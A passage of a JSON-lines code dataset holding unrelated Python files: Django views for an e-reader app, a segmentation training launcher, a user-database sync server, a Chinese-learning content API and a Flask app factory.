exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef getHighlights(request):\n\tmessage = {}\n\thighlights = []\n\ttry:\n\t\tuser = request.user\n\t\tbookId = int(request.POST.get('bookId',''))\n\t\tif bookId and user:\n\t\t\tbook = Book.objects.get(pk=bookId)\n\t\t\tuserHighlights = Highlight.objects.filter(user=user, book=book)\n\t\t\tfor highlight in userHighlights:\n\t\t\t\thighlights.append({'highlightText':highlight.text, 'chapterHref':highlight.chapterHref, 'pageCfi':highlight.pageCfi, 'wordRange':highlight.wordRange})\n\t\t\tmessage['highlightList'] = highlights\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['error'] = 'Error in retrieving Highlights.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef saveNotes(request):\n\tmessage = {}\n\ttry:\n\t\tuser = request.user\n\t\tbookId = int(request.POST.get('bookId',''))\n\t\twordRange = request.POST.get('wordRange','')\n\t\tpageCfi = request.POST.get('pageCfi','')\n\t\tchapterHref = request.POST.get('chapterHref','')\n\t\tnoteText = request.POST.get('noteText','')\n\t\tbook = Book.objects.get(pk=bookId)\n\n\t\tif book and wordRange and pageCfi and chapterHref and noteText:\n\t\t\tnewNote = Note(user=user, book=book, text=noteText, wordRange=wordRange, chapterHref=chapterHref, pageCfi=pageCfi)\n\t\t\tnewNote.save()\n\t\t\tmessage['message'] = 'Notes saved successfully.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['message'] = 'Error occured while saving Note.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef saveBookmark(request):\n\tmessage = {}\n\ttry:\n\t\tuser = request.user\n\t\tbookmarkName = request.POST.get('bookmarkName','')\n\t\tbookId = int(request.POST.get('bookId',''))\n\t\tpageCfi = request.POST.get('pageCfi','')\n\t\tchapterHref = request.POST.get('chapterHref','')\n\t\tbook = Book.objects.get(pk=bookId)\n\n\t\tif book and pageCfi and chapterHref and bookmarkName:\n\t\t\tnewBookmark = BookMark(user=user, book=book, bookmarkName=bookmarkName, chapterHref=chapterHref, pageCfi=pageCfi)\n\t\t\tnewBookmark.save()\n\t\t\tmessage['message'] = 'Bookmark saved successfully'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['message'] = 'Error occured while saving Bookmark.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef saveHighlights(request):\n\tmessage = {}\n\ttry:\n\t\tuser = request.user\n\t\tbookId = int(request.POST.get('bookId',''))\n\t\twordRange = request.POST.get('wordRange','')\n\t\tpageCfi = request.POST.get('pageCfi','')\n\t\tchapterHref = request.POST.get('chapterHref','')\n\t\ttext = request.POST.get('text','')\n\t\tbook = Book.objects.get(pk=bookId)\n\n\t\tif book and pageCfi and chapterHref and text and wordRange:\n\t\t\tnewHighlight = Highlight(user=user, book=book, wordRange=wordRange, text=text, chapterHref=chapterHref, pageCfi=pageCfi)\n\t\t\tnewHighlight.save()\n\t\t\tmessage['message'] = 'Highlight saved successfully'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['message'] = 'Error occured while saving Highlight'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef editProfile(request):\n\tmessage = {}\n\ttry:\n\t\tuser = request.user\n\t\tfieldToEdit = request.POST.get('field','')\n\t\tnewValue = request.POST.get('value')\n\n\t\tif fieldToEdit == 'first_name':\n\t\t\tuser.first_name = newValue\n\t\telif fieldToEdit == 'last_name':\n\t\t\tuser.last_name = newValue\n\t\telif fieldToEdit == 'address':\n\t\t\tuser.extendeduser.address = newValue\n\t\telif fieldToEdit == 'city':\n\t\t\tuser.extendeduser.city = newValue\n\t\telif fieldToEdit == 'country':\n\t\t\tuser.extendeduser.country = newValue\n\t\telse:\n\t\t\tmessage['message'] = fieldToEdit+' is not editable.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\tuser.extendeduser.save()\n\t\tuser.save()\n\t\tmessage['message'] = 'Profile updated'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef searchBook(request):\n\tbookList = []\n\tbookFound = False\n\tmessage = {}\n\tcurrBookFound = False\n\ttry:\n\t\tuser = request.user\n\t\tsearchKey = request.POST.get('searchKey','')\n\n\t\tif searchKey:\n\t\t\tallBooks = Book.objects.all()\n\t\t\tprint(allBooks)\n\t\t\tfor book in allBooks:\n\t\t\t\tif re.search(searchKey, book.bookName, re.IGNORECASE):\n\t\t\t\t\tcurrBookFound = True\n\t\t\t\t\tbookFound = True\n\t\t\t\telif re.search(searchKey, book.author, re.IGNORECASE):\n\t\t\t\t\tcurrBookFound = True\n\t\t\t\t\tbookFound = True\n\t\t\t\telif re.search(searchKey, book.isbn, re.IGNORECASE):\n\t\t\t\t\tcurrBookFound = True\n\t\t\t\t\tbookList.append(book)\n\t\t\t\t\tbookFound = True\n\n\t\t\t\tif currBookFound:\n\t\t\t\t\tcurrBookFound = False\n\t\t\t\t\ttempBook = {}\n\t\t\t\t\ttempBook['id'] = book.id\n\t\t\t\t\ttempBook['bookName'] = book.bookName\n\t\t\t\t\ttempBook['coverImageUrl'] = '/media'+str(book.coverImageUrl).split('media')[1]\n\t\t\t\t\ttempBook['author'] = book.author\n\t\t\t\t\tbookList.append(tempBook)\n\n\t\t\tif not bookFound:\n\t\t\t\tmessage['message'] = 'Book not found'\n\t\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\t\telse:\n\t\t\t\tmessage['bookList'] = bookList\n\t\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['message'] = 'Provide a valid search key.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef userIssuedBooks(request):\n\tuser = request.user\n\tmessage = {}\n\tissuedBookList = []\n\ttry:\n\t\tuserIssuedBooks = BooksIssued.objects.filter(user=user)\n\t\tif userIssuedBooks:\n\t\t\tfor book in userIssuedBooks:\n\t\t\t\tissuedBookList.append(book.book.id)\n\t\t\tmessage['issuedBookList'] = issuedBookList\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['issuedBookList'] = []\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef checkLogin(request):\n\tuser = request.user\n\tif user is None or not user.is_authenticated or user.is_anonymous():\n\t\turl = reverse('account_login')\n\telse:\n\t\turl = reverse('reader:mylibrary', kwargs={'pk':user.id,'user_name':user.username})\n\treturn HttpResponseRedirect(url)\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders its content into JSON.\n \"\"\"\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n\t\t\n\t\t\n\"\"\"\nREST API functions\n\"\"\"\n\nclass UserList(generics.ListCreateAPIView):\n\tqueryset = User.objects.all()\n\tserializer_class = UserSerializer\n\nclass UserDetail(generics.RetrieveUpdateDestroyAPIView):\n\tqueryset = User.objects.all()\n\tserializer_class = UserSerializer\n\t\nclass BookIssuedList(generics.ListCreateAPIView):\n\tqueryset = BooksIssued.objects.all()\n\tserializer_class = BooksIssuedSerializer\n\n\n@api_view(['GET'])\n@authentication_classes((TokenAuthentication,))\n@permission_classes((IsAuthenticated,))\t\t\n@csrf_exempt\ndef issuedBooks(request, pk, format=None):\n\tif request.method == 'GET':\n\t\tresponse_dict = {}\n\t\tissuedBooksList = BooksIssued.objects.filter(user_id=pk)\n\t\tif issuedBooksList:\n\t\t\tresponse_dict[\"user\"] = pk\n\t\t\tresponse_dict[\"books\"] = []\n\t\t\tfor books in issuedBooksList:\n\t\t\t\ttemp = {}\n\t\t\t\ttemp[\"id\"] = books.book.id\n\t\t\t\ttemp[\"author\"] = books.book.author\n\t\t\t\ttemp[\"isbn\"] = books.book.isbn\n\t\t\t\ttemp[\"bookName\"] = books.book.bookName\n\t\t\t\ttemp[\"bookEpub\"] = \"http://52.77.237.94\"+str(books.book.bookEpub).replace('/home/ubuntu/EReader_Django','')\n\t\t\t\ttemp[\"coverImageUrl\"] = \"http://52.77.237.94\"+str(books.book.coverImageUrl).replace('/home/ubuntu/EReader_Django','')\n\t\t\t\ttemp[\"pub_date\"] = books.book.pub_date.isoformat()\n\t\t\t\tresponse_dict[\"books\"].append(temp)\n\t\telse:\n\t\t\tresponse_dict[\"error\"] = \"No Books Issued by the User or Invalid User/Book Id provided\"\n\t\t\treturn JSONResponse(json.dumps(response_dict), status=400)\n\t\treturn JSONResponse(response_dict)\n\n@api_view(['POST'])\n@authentication_classes((TokenAuthentication,))\n@permission_classes((IsAuthenticated,))\t\t\n@csrf_exempt\ndef issueBook(request, user, book, format=None):\n\tif request.method == 'POST':\n\t\tresponse = {}\n\t\ttry:\n\t\t\tuser = User.objects.get(pk=user)\n\t\texcept User.DoesNotExist:\n\t\t\tresponse['error'] = 'User Id is invalid.'\n\t\t\treturn Response(json.dumps(response), status=status.HTTP_400_BAD_REQUEST)\n\t\t\n\t\ttry:\n\t\t\tbookToIssue = Book.objects.get(pk=book)\n\t\texcept Book.DoesNotExist:\n\t\t\tresponse['error'] = 'Book Id is invalid.'\n\t\t\treturn Response(json.dumps(response), status=status.HTTP_400_BAD_REQUEST)\n\t\t\n\t\tif user and bookToIssue:\n\t\t\tissuedBooks, created = BooksIssued.objects.get_or_create(user=user, book=bookToIssue)\n\t\t\tif issuedBooks:\n\t\t\t\tresponse['success'] = \"Book already issued\"\n\t\t\telse:\n\t\t\t\tresponse['success'] = \"Book Issued Successfully\"\n\t\t\treturn Response(json.dumps(response), status=status.HTTP_201_CREATED)\n\t\telse:\n\t\t\treturn Response(json.dumps(response), status=status.HTTP_400_BAD_REQUEST)\n\t\t\t\n@api_view(['DELETE'])\n@authentication_classes((TokenAuthentication,))\n@permission_classes((IsAuthenticated,))\t\t\n@csrf_exempt\ndef returnBook(request, user, book, format=None):\n\tif request.method == 'DELETE':\n\t\tresponse = {}\n\t\ttry:\n\t\t\tuser = User.objects.get(pk=user)\n\t\texcept User.DoesNotExist:\n\t\t\tresponse['error'] = 'User Id is invalid.'\n\t\t\treturn Response(json.dumps(response), status=status.HTTP_400_BAD_REQUEST)\n\t\t\n\t\ttry:\n\t\t\tbookToIssue = Book.objects.get(pk=book)\n\t\texcept Book.DoesNotExist:\n\t\t\tresponse['error'] = 'Book Id is invalid.'\n\t\t\treturn Response(json.dumps(response), status=status.HTTP_400_BAD_REQUEST)\n\t\t\t\n\t\tif user and bookToIssue:\n\t\t\tissuedRecord = BooksIssued.objects.get(user=user, book=bookToIssue)\n\t\t\tif issuedRecord:\n\t\t\t\tissuedRecord.delete()\n\t\t\t\tresponse['success'] = \"Book Issued Successfully\"\n\t\t\t\treturn Response(status=status.HTTP_204_NO_CONTENT)\n\t\t\telse:\n\t\t\t\tresponse['error'] = \"The mentioned book is not issued by the user\"\n\t\t\t\treturn Response(json.dumps(response), status=status.HTTP_400_BAD_REQUEST)\n\t\t\t\n\t\telse:\n\t\t\treturn Response(json.dumps(response), status=status.HTTP_400_BAD_REQUEST)\n\nclass BookList(generics.ListCreateAPIView):\n\tqueryset = Book.objects.all()\n\tserializer_class = BookSerializer\n\nclass BookDetail(generics.RetrieveUpdateDestroyAPIView):\n\tqueryset = Book.objects.all()\n\tserializer_class = BookSerializer\t\n","repo_name":"ankitgoyalgithub/EReader_Django","sub_path":"reader/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26086099445","text":"import matplotlib as matplt\nmatplt.use('Agg')\nimport os, sys\nsys.path.insert(0,os.path.abspath('..'))\nsys.path.insert(0,os.path.abspath('.'))\nsys.path.insert(0,os.path.abspath('../easyreg'))\nimport numpy as np\nimport torch\nimport random\nimport tools.module_parameters as pars\nfrom abc import ABCMeta, abstractmethod\nfrom easyreg.piplines import run_one_task\ntorch.backends.cudnn.benchmark=True\n\n\n\nclass BaseTask():\n __metaclass__ = ABCMeta\n\n def __init__(self, name):\n self.name = name\n\n @abstractmethod\n def save(self):\n pass\n\n\nclass DataTask(BaseTask):\n \"\"\"\n base module for data setting files (.json)\n \"\"\"\n\n def __init__(self, name, path='../settings/base_data_settings.json'):\n super(DataTask, self).__init__(name)\n self.data_par = pars.ParameterDict()\n self.data_par.load_JSON(path)\n\n def save(self, path='../settings/data_settings.json'):\n self.data_par.write_ext_JSON(path)\n\n\nclass ModelTask(BaseTask):\n \"\"\"\n base module for task setting files (.json)\n \"\"\"\n\n def __init__(self, name, path='../settings/base_task_settings.json'):\n super(ModelTask, self).__init__(name)\n self.task_par = pars.ParameterDict()\n self.task_par.load_JSON(path)\n\n def save(self, path='../settings/task_settings.json'):\n self.task_par.write_ext_JSON(path)\n\n\n\n\ndef init_train_env(setting_path,output_root_path, task_name, data_task_name=None):\n \"\"\"\n create train environment.\n\n :param setting_path: the path to load 'cur_task_setting.json' and 'cur_data_setting.json' (optional if the related settings are in cur_task_setting)\n :param output_root_path: the output path\n :param data_task_name: data task name i.e. lung_seg_task , oai_seg_task\n :param task_name: task name i.e. run_unet, run_with_ncc_loss\n :return:\n \"\"\"\n dm_json_path = os.path.join(setting_path, 'cur_data_setting.json')\n tsm_json_path = os.path.join(setting_path, 'cur_task_setting.json')\n assert os.path.isfile(tsm_json_path),\"task setting {} not exists\".format(tsm_json_path)\n dm = DataTask('task_reg',dm_json_path) if os.path.isfile(dm_json_path) else None\n tsm = ModelTask('task_reg',tsm_json_path)\n data_task_name = data_task_name if len(data_task_name) else 'custom'\n data_task_path = os.path.join(output_root_path,data_task_name)\n if dm is not None:\n dm.data_par['datapro']['dataset']['output_path'] = output_root_path\n dm.data_par['datapro']['dataset']['task_name'] = data_task_name\n tsm.task_par['tsk_set']['task_name'] = task_name\n tsm.task_par['tsk_set']['output_root_path'] = data_task_path\n return dm, tsm\n\n\n\ndef backup_settings(args):\n \"\"\"\n The settings saved in setting_folder_path/task_name/cur_data_setting.json and setting_folder_path/task_name/cur_task_setting.json\n\n :param args:\n :return: None\n \"\"\"\n setting_folder_path = args.setting_folder_path\n dm_json_path = os.path.join(setting_folder_path, 'cur_data_setting.json')\n tsm_json_path = os.path.join(setting_folder_path, 'cur_task_setting.json')\n dm = DataTask('task_reg', dm_json_path) if os.path.isfile(dm_json_path) else None\n tsm = ModelTask('task_reg', tsm_json_path)\n task_name = args.task_name_record\n setting_backup = os.path.join(setting_folder_path, task_name+'_backup')\n os.makedirs(setting_backup, exist_ok=True)\n dm_backup_json_path = os.path.join(setting_backup, 'cur_data_setting.json')\n tsm_backup_json_path =os.path.join(setting_backup,'cur_task_setting.json')\n tsm.save(tsm_backup_json_path)\n if dm is not None:\n dm.save(dm_backup_json_path)\n\n\n\n\ndef __do_segmentation_train(args,pipeline=None):\n \"\"\"\n set running env and run the task\n\n :param args: the parsed arguments\n :param pipeline:a Pipeline object\n :return: a Pipeline object\n \"\"\"\n\n output_root_path = args.output_root_path\n task_name = args.task_name\n data_task_name = args.data_task_name\n setting_folder_path = args.setting_folder_path\n data_task_path = os.path.join(output_root_path,data_task_name)\n task_output_path = os.path.join(data_task_path,task_name)\n os.makedirs(task_output_path, exist_ok=True)\n dm, tsm = init_train_env(setting_folder_path,output_root_path,task_name,data_task_name)\n tsm.task_par['tsk_set']['gpu_ids'] = args.gpu_id\n dm_json_path = os.path.join(task_output_path, 'cur_data_setting.json') if dm is not None else None\n tsm_json_path = os.path.join(task_output_path, 'cur_task_setting.json')\n tsm.save(tsm_json_path)\n if dm is not None:\n dm.save(dm_json_path)\n data_loaders = pipeline.data_loaders if pipeline is not None else None\n pipeline = run_one_task(tsm_json_path, dm_json_path,data_loaders)\n return pipeline\n\n\n\n\ndef do_segmentation_train(args):\n \"\"\"\n\n :param args: the parsed arguments\n :return: None\n \"\"\"\n task_name = args.task_name\n args.task_name_record = task_name\n backup_settings(args)\n pipeline = None\n __do_segmentation_train(args,pipeline)\n\n\n\n\n\n\n\nif __name__ == '__main__':\n \"\"\"\n An interface for learning segmentation methods.\n Assume there is three level folder, output_root_path/ data_task_name/ task_name\n In data_task_folder, you must include train/val/test/debug folders, for details please refer to doc/source/notes/preapre_data.rst\n Arguments: \n --output_root_path/ -o: the path of output folder\n --data_task_name/ -dtn: data task name i.e. lung_reg_task , oai_reg_task\n --task_name / -tn: task name i.e. run_training_vsvf_task, run_training_rdmm_task\n --setting_folder_path/ -ts: path of the folder where settings are saved,should include cur_task_setting.json\n --gpu_id/ -g: gpu_id to use\n \"\"\"\n import argparse\n\n parser = argparse.ArgumentParser(description=\"An easy interface for training segmentation models\")\n parser.add_argument('-o','--output_root_path', required=False, type=str,\n default=None,help='the path of output folder')\n parser.add_argument('-dtn','--data_task_name', required=False, type=str,\n default='',help='the name of the data related task (like subsampling)')\n parser.add_argument('-tn','--task_name', required=False, type=str,\n default=None,help='the name of the task')\n parser.add_argument('-ts','--setting_folder_path', required=False, type=str,\n default=None,help='path of the folder where settings are saved,should include cur_task_setting.json)')\n parser.add_argument('-g',\"--gpu_id\",required=False,type=int,default=0,help='gpu_id to use')\n args = parser.parse_args()\n print(args)\n do_segmentation_train(args)\n\n","repo_name":"uncbiag/easyreg","sub_path":"demo/demo_for_seg_train.py","file_name":"demo_for_seg_train.py","file_ext":"py","file_size_in_byte":6756,"program_lang":"python","lang":"en","doc_type":"code","stars":148,"dataset":"github-code","pt":"78"} +{"seq_id":"25666228235","text":"import prologin.config\nimport prologin.log\nimport prologin.udb.client\nimport prologin.synchronisation\nimport sys\n\n\nPUB_CFG = prologin.config.load('udbsync-pub')\nSUB_CFG = prologin.config.load('udbsync-sub')\n\n\nclass SyncServer(prologin.synchronisation.Server):\n def __init__(self, pub_secret, sub_secret, port):\n super(SyncServer, self).__init__(\n 'login',\n pub_secret,\n sub_secret,\n port,\n 'udbsync',\n )\n\n def get_initial_backlog(self):\n return prologin.udb.client.connect(auth=True).query_private()\n\n\nif __name__ == '__main__':\n prologin.log.setup_logging('udbsync')\n\n if 'shared_secret' not in PUB_CFG:\n raise RuntimeError(\n \"Missing shared_secret in the udbsync-pub YAML config\"\n )\n\n if 'shared_secret' not in SUB_CFG:\n raise RuntimeError(\n \"Missing shared_secret in the udbsync-sub YAML config\"\n )\n\n if len(sys.argv) > 1:\n port = int(sys.argv[1])\n else:\n port = 8000\n server = SyncServer(\n PUB_CFG['shared_secret'], SUB_CFG['shared_secret'], port\n )\n server.start()\n","repo_name":"prologin/sadm","sub_path":"prologin/udbsync/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"78"} +{"seq_id":"32587815991","text":"import re\n\nfrom dal import autocomplete\nfrom django.core.exceptions import ValidationError\nfrom django.contrib.contenttypes.models import ContentType\nfrom rest_framework.generics import get_object_or_404\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.exceptions import NotFound, ParseError\n\nfrom content.models import GeneralQuestion, LinkedField, Word, Sentence\nfrom learning.models import Record\nfrom content.utils import unaccent\n\n\nclass QuestionView(APIView):\n \"\"\"\n Displays and checks answers for questions\n \"\"\"\n\n def initial(self, request, *args, **kwargs):\n super().initial(request, *args, **kwargs)\n question_pk = self.kwargs.pop('pk', None)\n self.question = get_object_or_404(GeneralQuestion.objects.all(),\n pk=question_pk)\n\n def get(self, request):\n show_all_options = request.session.get('show_all_options', False)\n try:\n client_dict = self.question.render(\n show_all_options=show_all_options\n )\n except ValidationError:\n raise NotFound\n return Response(client_dict)\n\n def post(self, request):\n data = request.data.copy()\n try:\n is_correct, correct_answer = self.question.check_answer(\n data.get('answer', None))\n except ValidationError:\n raise NotFound\n # create Record\n user = request.user if request.user.is_authenticated else None\n Record.objects.create(\n action=Record.Action.CORRECT_ANSWER if is_correct\n else Record.Action.WRONG_ANSWER,\n user=user,\n reviewable=self.question.reviewable,\n question=self.question,\n data={\n 'answer': data.get('answer', None)\n }\n )\n return Response({\n 'is_correct': is_correct,\n 'answer': correct_answer,\n })\n\n\nclass LinkedFieldAutocomplete(autocomplete.Select2QuerySetView):\n def get_result_label(self, result):\n if self.field_name == '__str__':\n field = str(self.field_name)\n else:\n field = getattr(result, self.field_name)\n return f\"{repr(result)}'s {self.field_name}: {field}\"\n\n def get_queryset(self):\n # Don't forget to filter out results depending on the visitor !\n if not self.request.user.is_staff:\n return LinkedField.objects.none()\n\n content_type_id = self.forwarded.get('content_type', None)\n self.field_name = self.forwarded.get('field_name', '__str__')\n if content_type_id is None:\n return LinkedField.objects.none()\n\n model_class = ContentType.objects.get(pk=content_type_id).model_class()\n if model_class in (Word, Sentence):\n self.search_fields = ['chinese']\n else:\n return LinkedField.objects.none()\n\n if self.field_name in [field.name for field in Word._meta.fields]:\n self.search_fields.append(self.field_name)\n qs = model_class.objects.all()\n qs = self.get_search_results(qs, self.q)\n return qs\n\n\nclass SearchAPIView(APIView):\n \"\"\"\n __POST__: searches keyword in content database\n\n keyword (str, required): the query keyword to be searched\n\n query_type (str, default=auto): should be among 'chinese', 'pinyin',\n 'definition', 'auto'. This indicates what to search against in database.\n Use 'auto' to let the backend determine automatically.\n\n __returns__:\n\n results ([objects]): a list of serialized words / characters / radicals\n object (for now only supporting word results).\n\n query_type (str): 'chinese', 'pinyin', or 'definition', indicating what the\n backend uses for the search\n \"\"\"\n def post(self, request):\n try:\n keyword = request.data['keyword']\n except KeyError:\n raise ParseError(\"keyword not found\")\n query_type = request.data.get('query_type', 'auto').lower()\n if query_type not in ('auto', 'chinese', 'pinyin', 'definition'):\n raise ParseError(f\"query type must be either 'auto', 'chinese',\"\n f\" 'pinyin', or 'definition'. not {query_type}\")\n\n keyword = keyword.strip()\n if not keyword:\n return Response({'results': [], 'query_type': 'definition'})\n\n if query_type in ('auto', 'chinese'):\n # searches for chinese words with keyword as substring\n chinese_regex = r'.*?'.join([''] + list(keyword) + [''])\n queryset = Word.objects.filter(chinese__regex=chinese_regex)\n if query_type == 'auto' and queryset.exists():\n query_type = 'chinese'\n if query_type in ('auto', 'pinyin'):\n # if problem with 儿化音, will use regex with many searchable\n # pinyin options\n pinyin_keyword = re.sub(r'[^a-zA-Z]', r'', unaccent(keyword))\n queryset = Word.objects.filter(\n searchable_pinyin__iexact=pinyin_keyword)\n if query_type == 'auto' and queryset.exists():\n query_type = 'pinyin'\n if query_type in ('auto', 'definition'):\n queryset = Word.objects.filter(\n definition__definition__search=keyword)\n query_type = 'definition'\n queryset = queryset.prefetch_related('definitions')\n results = [{\n 'type': obj.__class__.__name__.lower(),\n 'qid': obj.id,\n 'chiense': obj.chinese,\n 'pinyin': obj.pinyin,\n 'definition': obj.full_definition,\n }\n for obj in queryset.all()\n ]\n return Response({\n 'results': results,\n 'query_type': query_type\n })\n\n POST_action = {\n 'keyword': {\n 'type': 'string',\n 'example': 'hello',\n },\n 'query_type': {\n 'type': 'string',\n 'example': 'auto',\n },\n }\n","repo_name":"solved-chinese/app","sub_path":"content/API_views.py","file_name":"API_views.py","file_ext":"py","file_size_in_byte":6063,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"78"} +{"seq_id":"74743800573","text":"from flask import Flask, Blueprint, render_template\nfrom .flass import Flass\nfrom .flex import Flex\nfrom .flinf import Flinf\nfrom .flab import Flab\nfrom .flap import Flap\nfrom .signals import app_created_successfully\n\n\nclass FlailsError(Exception):\n pass\n\n\nclass Flails(object):\n registration_manager_cls = Flap\n blueprints_manager_cls = Flab\n assets_manager_cls = Flass\n extensions_manager_cls = Flex\n information_manager_cls = Flinf\n initialize = {'app_name': __name__,\n 'app_config_requires': None,\n 'app_inside_module': None,\n 'requested_info': None,\n 'assets_env': None,\n 'assets_do_register': True,\n 'assets_do_parse_static': True,\n 'assets_do_exclude_blueprints': None,\n 'assets_do_log': True,\n 'information_page': True}\n\n def __init__(self, initialize=initialize, **kwargs):\n for k, v in initialize.items():\n setattr(self, k, kwargs.pop(k, v))\n self.app_config = self.check_config(kwargs.pop('app_config', None),\n kwargs.pop('app_config_requires',\n None))\n self.initialize_managers(**kwargs)\n\n def check_config(self, app_config, app_config_requires):\n \"\"\"Forces a check on your configuration file\"\"\"\n if app_config_requires is not None:\n for c in app_config_requires:\n if not hasattr(app_config, c):\n raise FlailsError('Configuration MUST contain or specify in some manner: {}'.format(c))\n return app_config\n\n def initialize_managers(self, **kwargs):\n self.app_registrations = self.registration_manager_cls(self)\n self.app_assets = self.assets_manager_cls(self,\n app_asset_env=kwargs.pop('assets_env', None),\n do_exclude_blueprints=kwargs.pop('assets_do_exclude_blueprints', None),\n do_parse_static_main=kwargs.pop('assets_do_parse_static', True),\n do_exclude_files=kwargs.pop('assets_do_exclude_files', []),\n do_log=kwargs.pop('assets_do_log', True))\n self.app_extensions = self.extensions_manager_cls(self)\n self.app_information = self.information_manager_cls\n self.app_blueprints = self.blueprints_manager_cls(self)\n\n @property\n def info_page_blueprint(self):\n info_bp = Blueprint('info_page', __name__, template_folder='templates')\n\n def info_page():\n return render_template('info_page.html', info=self.generated_app_info)\n\n info_bp.route('/info_page', methods=['GET'])(info_page)\n return info_bp\n\n def create_app(self, **kwargs):\n self.create_time_additions('EXTENSIONS',\n kwargs.pop('extensions', None))\n self.create_time_additions('BLUEPRINTS',\n kwargs.pop('blueprints', None))\n\n app = Flask(self.app_name)\n\n for k in kwargs:\n if k in ('import_name',\n 'static_url_path',\n 'static_folder',\n 'template_folder',\n 'views_folder',\n 'blueprints_folder',\n 'instance_path',\n 'instance_relative_config'):\n setattr(app, k, kwargs.get(k))\n\n self.configure_app(app, kwargs.pop('create_time_settings', None))\n\n self.configure_extensions(app, self.app_config)\n\n for k, v in self.app_registrations.app_actions.items():\n action = getattr(self.app_config, k.upper(), None)\n fn, values = v, action\n if values:\n fn(app, values)\n\n self.configure_blueprints(app, getattr(self.app_config, 'BLUEPRINTS', None))\n\n if self.assets_do_register:\n self.app_assets.register_assets(app)\n\n if self.information_page:\n app.register_blueprint(self.info_page_blueprint)\n\n setattr(self, 'generated_app', app)\n\n app_created_successfully.send(self)\n app.logger.info(\"Application {!r} successfully generated\".format(self.generated_app))\n\n setattr(self, 'generated_app_info', self.app_information(self, self.generated_app, self.requested_info))\n\n return self.generated_app\n\n def create_time_additions(self, what, to_add):\n if to_add and hasattr(self.app_config, what):\n x = getattr(self.app_config, what)\n x.extend(to_add)\n elif to_add:\n setattr(self.app_config, what, to_add)\n else:\n pass\n\n def configure_app(self, app, create_time_settings):\n app.config.from_object(self.app_config)\n if create_time_settings:\n app.config.from_object(create_time_settings)\n app.config.from_envvar(\"{}_APP_CONFIG\".format(self.app_name.upper()),\n silent=True)\n\n def configure_extensions(self, app, app_config):\n self.app_extensions.configure_extensions(app, app_config)\n\n def configure_blueprints(self, app, blueprints):\n 